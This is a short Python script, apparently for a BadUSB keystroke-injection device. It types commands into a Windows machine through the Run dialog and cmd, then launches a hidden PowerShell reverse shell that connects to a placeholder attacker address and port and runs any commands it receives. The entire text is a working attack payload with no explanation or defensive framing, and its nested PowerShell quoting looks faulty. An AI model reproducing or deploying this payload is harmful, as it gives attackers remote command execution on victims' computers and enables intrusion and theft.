keyboard.send(badUSB.WINDOWS, badUSB.R)
time.sleep(1)
layout.write("cmd")
time.sleep(1)
keyboard.send(badUSB.ENTER)
time.sleep(1)

rsc = '''powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP', PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.UTF8Encoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::UTF8).GetBytes($sendback2);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()}"
'''
layout.write(f'powershell -NoP -NonI -W Hidden -Exec Bypass -Command "{rsc}"')
keyboard.send(badUSB.ENTER)

time.sleep(1)
